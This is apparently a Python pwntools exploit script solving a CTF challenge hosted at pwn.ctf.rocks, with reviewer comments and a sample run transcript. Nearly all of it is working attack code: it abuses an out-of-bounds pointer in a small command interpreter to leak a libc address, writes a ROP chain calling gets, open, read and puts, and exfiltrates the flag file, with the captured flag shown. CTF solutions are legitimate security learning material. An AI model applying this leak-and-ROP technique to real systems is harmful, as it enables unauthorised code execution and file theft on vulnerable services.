from pwn import *
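def movPtr(offset):
    """Encode a data-pointer move of *offset* cells as a command string.

    A positive offset emits one ``"!>"`` token per cell, a negative offset
    one ``"!<"`` token per cell. An offset of zero yields the empty string
    (the original fell through and returned ``None``, which then broke
    string concatenation in callers such as ``puts``/``write``).
    """
    if offset > 0:
        return "!>" * offset
    if offset < 0:
        return "!<" * (-offset)
    # Zero offset: nothing to emit, but keep the return type a str.
    return ""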
def putchar():
    """Return the single command token that prints the current cell."""
    token = "!:"
    return token
def puts(size):
    """Return commands that print *size* consecutive cells.

    Each cell is emitted with the print token followed by a one-cell
    pointer advance; *size* <= 0 produces the empty string.
    """
    # "!:" prints the current cell, "!>" moves the pointer one cell right.
    step = "!:" + "!>"
    return "".join(step for _ in range(size))
def write(n):
    """Return commands that write *n* consecutive cells.

    Each cell is emitted with the write token followed by a one-cell
    pointer advance; *n* <= 0 produces the empty string.
    """
    # "!." writes the current cell, "!>" moves the pointer one cell right.
    step = "!." + "!>"
    return step * n if n > 0 else ""
#Gadgets
# NOTE(review): every address and offset in this file is tied to one specific
# challenge binary and libc build (values taken as-is from the writeup); they
# are not general and will not match other targets.
POP_RDI = 0x400e93
POP_RSI_POP_R15 = 0x400e91
ROP_CHAIN_SIZE = 200
RET_ADDRESS_OFFSET = 520
BSS_ADDR = 0x6020E0
# Connection to the (now historical) CTF challenge service.
r = remote("pwn.ctf.rocks", 31337)
code = movPtr(RET_ADDRESS_OFFSET)
code += puts(8) #leak libc
code += movPtr(-8) #reset ptr
code += write(ROP_CHAIN_SIZE)
r.recvuntil("code:")
r.sendline(code)
# NOTE(review): str is used where pwntools 4 on Python 3 returns/expects bytes
# (ljust fill, find, ljust pad) -- this looks written for Python 2; confirm.
s = r.recvuntil("\x00")
libcMainAddr = u64(s.ljust(8, "\x00"))
info("Leak: libc_start_main+240 %s" % hex(libcMainAddr))
# Hard-coded distances from the leaked symbol; valid only for the libc build
# the challenge shipped.
openAddr = libcMainAddr + 875552
readAddr = libcMainAddr + 876096
getsAddr = libcMainAddr + 320848
putsAddr = 0x400DF6
#Rop chain
rop = p64(POP_RDI)
rop += p64(BSS_ADDR)
rop += p64(getsAddr)
rop += p64(POP_RDI)
rop += p64(BSS_ADDR)
rop += p64(POP_RSI_POP_R15)
rop += p64(0x0) + p64(0xdeadbeef)
rop += p64(openAddr)
rop += p64(POP_RDI)
rop += p64(3)
rop += p64(POP_RSI_POP_R15)
rop += p64(BSS_ADDR)
rop += p64(0xdeadbeef)
rop += p64(readAddr)
rop += p64(POP_RDI)
rop += p64(BSS_ADDR)
rop += p64(putsAddr)
# Pad to exactly ROP_CHAIN_SIZE bytes so the write() command count above matches.
r.send(rop.ljust(ROP_CHAIN_SIZE, "A"))
r.recvuntil("RTFM!\n")
r.sendline("/home/ctf/flag")
s = r.recvline()
# Trim the response at the closing brace of the flag format.
info("Got flag! %s" % s[:s.find("}")+1])
r.close()
# Sample transcript from the original run (values are specific to that session).
#[+] Opening connection to pwn.ctf.rocks on port 31337: Done
#[*] Leak: libc_start_main+240 0x7fb2c3ce0830
#[*] Got flag! SCTF{0uT_oF_BoUNdZ_out_0F_c0ntr0lzZz}
#[*] Closed connection to pwn.ctf.rocks port 31337